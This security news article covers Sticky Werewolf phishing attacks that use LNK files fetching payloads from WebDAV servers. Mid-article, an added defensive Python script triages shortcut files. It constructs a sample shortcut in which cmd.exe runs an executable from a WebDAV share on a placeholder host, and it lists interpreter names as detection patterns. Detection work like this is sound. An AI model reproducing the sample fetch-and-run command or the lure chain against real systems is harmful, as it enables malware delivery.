
Cybersecurity researchers have disclosed details of a threat actor known as Sticky Werewolf that has been linked to cyber attacks targeting entities in Russia and Belarus.
The phishing attacks were aimed at a pharmaceutical company, a Russian research institute dealing with microbiology and vaccine development, and the aviation sector, expanding beyond their initial focus on government organizations, Morphisec said in a report last week.
"In previous campaigns, the infection chain began with phishing emails containing a link to download a malicious file from platforms like gofile.io," security researcher Arnold Osipov said. "This latest campaign used archive files containing LNK files pointing to a payload stored on WebDAV servers."

Sticky Werewolf, one of the many threat actors targeting Russia and Belarus, alongside Cloud Werewolf (aka Inception and Cloud Atlas), Quartz Wolf, Red Wolf (aka RedCurl), and Scaly Wolf, was first documented by BI.ZONE in October 2023. The group is believed to have been active since at least April 2023.
Prior attacks documented by the cybersecurity company leveraged phishing emails with links to malicious payloads that culminated in the deployment of the NetWire remote access trojan (RAT), whose infrastructure was taken down early last year following a law enforcement operation.
The new attack chain observed by Morphisec involves the use of a RAR archive attachment that, when extracted, contains two LNK files and a decoy PDF document. The PDF claims to be an invitation to a video conference and urges the recipients to click on the LNK files to get the meeting agenda and the email distribution list.
Opening either of the LNK files triggers the execution of a binary hosted on a WebDAV server, which leads to the launch of an obfuscated Windows batch script. The script, in turn, is designed to run an AutoIt script that ultimately injects the final payload while bypassing security software and analysis attempts.
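The LNK-to-WebDAV step above is the part of this chain a defender can check for mechanically: a shortcut whose target is a shell interpreter, or whose arguments or link information reference a WebDAV UNC path (`\\host@port\DavWWWRoot\...` or `\\host@SSL\...`), deserves a closer look before anyone double-clicks it. The following triage script is an added example, not code from Morphisec or from the report. It parses the MS-SHLLINK header, LinkInfo and StringData sections of a `.lnk` file and applies a few heuristics; it also includes a small builder so it runs offline on a constructed sample. The host `203.0.113.10`, the share and the file names in the sample are placeholders, not indicators from the article.

```python
"""Triage helper for Windows .lnk files: recover target, working directory and
arguments, then flag WebDAV/UNC references and script-interpreter targets.
Added example; the sample shortcut is constructed, not a real artifact."""
import re
import struct

# LinkFlags bits from the MS-SHLLINK specification (section 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}

# Heuristics applied to every recovered string field (lower-cased).
RULES = [
    (re.compile(r"\\\\[^\\]+@(ssl|\d+)\\"), "WebDAV UNC path (host@port or @SSL)"),
    (re.compile(r"davwwwroot"), "WebDAV DavWWWRoot share"),
    (re.compile(r"\b(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32)(\.exe)?\b"),
     "shell or script interpreter"),
]


def _cstr(data, off):
    """Null-terminated ANSI string starting at offset."""
    return data[off:data.index(b"\0", off)].decode("cp1252", "replace")


def _string_data(data, pos, unicode):
    """One StringData entry: uint16 character count followed by the string."""
    count = struct.unpack_from("<H", data, pos)[0]
    pos += 2
    if unicode:
        return data[pos:pos + 2 * count].decode("utf-16-le", "replace"), pos + 2 * count
    return data[pos:pos + count].decode("cp1252", "replace"), pos + count


def parse_lnk(data):
    """Return the string fields of a Shell Link that matter for triage."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    out = {"local_base_path": "", "net_name": "", "relative_path": "", "working_dir": "", "arguments": ""}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList (size prefix + items)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        info = pos
        info_size, _hdr, info_flags, _vol, lbp_off, cnrl_off, _suffix = struct.unpack_from("<7I", data, info)
        if info_flags & 0x1:                     # VolumeIDAndLocalBasePath
            out["local_base_path"] = _cstr(data, info + lbp_off)
        if info_flags & 0x2:                     # CommonNetworkRelativeLinkAndPathSuffix
            net_name_off = struct.unpack_from("<I", data, info + cnrl_off + 8)[0]
            out["net_name"] = _cstr(data, info + cnrl_off + net_name_off)
        pos = info + info_size
    # StringData entries appear in this fixed order when their flag is set.
    for flag, key in ((HAS_NAME, None), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, None)):
        if flags & flag:
            value, pos = _string_data(data, pos, bool(flags & IS_UNICODE))
            if key:
                out[key] = value
    return out


def assess(fields):
    """Return sorted (field, finding) pairs for suspicious shortcut content."""
    hits = set()
    for field, value in fields.items():
        for rx, label in RULES:
            if rx.search(value.lower()):
                hits.add((field, label))
    return sorted(hits)


def build_lnk(target, arguments="", working_dir=""):
    """Construct a minimal LNK (header + LinkInfo + StringData) for offline testing."""
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_WORKING_DIR if working_dir else 0) | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += bytes(0x4C - len(header))
    volume_id = struct.pack("<4I", 0x11, 3, 0, 0x10) + b"\0"   # 17 bytes, empty volume label
    local_path = target.encode("cp1252") + b"\0"
    lbp_off = 0x1C + len(volume_id)
    body = volume_id + local_path + b"\0"                       # trailing byte = empty path suffix
    link_info = struct.pack("<7I", 0x1C + len(body), 0x1C, 0x1, 0x1C, lbp_off, 0, lbp_off + len(local_path)) + body
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + link_info + (sd(working_dir) if working_dir else b"") + (sd(arguments) if arguments else b"")


# Constructed samples: the first mirrors the chain in the article (cmd.exe launching a
# payload from a WebDAV share); host, share and file names are placeholders.
SAMPLE_MALICIOUS = build_lnk(r"C:\Windows\System32\cmd.exe",
                             r'/c "\\203.0.113.10@80\DavWWWRoot\invite\schedule.exe"',
                             r"C:\Windows\System32")
SAMPLE_BENIGN = build_lnk(r"C:\Windows\notepad.exe", "", r"C:\Users\Public")

if __name__ == "__main__":
    for name, blob in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, assess(parse_lnk(blob)))
```

The parser deliberately ignores the LinkTargetIDList, so a shortcut that carries its target only as a shell item list (no LinkInfo, no arguments) produces no findings; treat an empty result as "nothing recovered", not as "clean", and pair this check with archive-level inspection of RAR attachments that bundle LNK files next to a decoy PDF.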
"This executable is an NSIS self-extracting archive which is part of a previously known crypter named CypherIT," Osipov said. "While the original CypherIT crypter is no longer being sold, the current executable is a variant of it, as observed in a few hacking forums."
The end goal of the campaign is to deliver commodity RATs and information stealer malware such as Rhadamanthys and Ozone RAT.

"While there is no definitive evidence pointing to a specific national origin for the Sticky Werewolf group, the geopolitical context suggests possible links to a pro-Ukrainian cyberespionage group or hacktivists, but this attribution remains uncertain," Osipov said.
The development comes as BI.ZONE revealed an activity cluster codenamed Sapphire Werewolf that has been attributed as behind more than 300 attacks on Russian education, manufacturing, IT, defense, and aerospace engineering sectors using Amethyst, an offshoot of the popular open-source SapphireStealer.
The Russian company, in March 2024, also uncovered clusters called Fluffy Wolf and Mysterious Werewolf that have used spear-phishing lures to distribute Remote Utilities, XMRig miner, WarZone RAT, and a bespoke backdoor dubbed RingSpy.
"The RingSpy backdoor allows an adversary to remotely execute commands, obtain their results, and download files from network resources," it noted. "The backdoor's [command-and-control] server is a Telegram bot."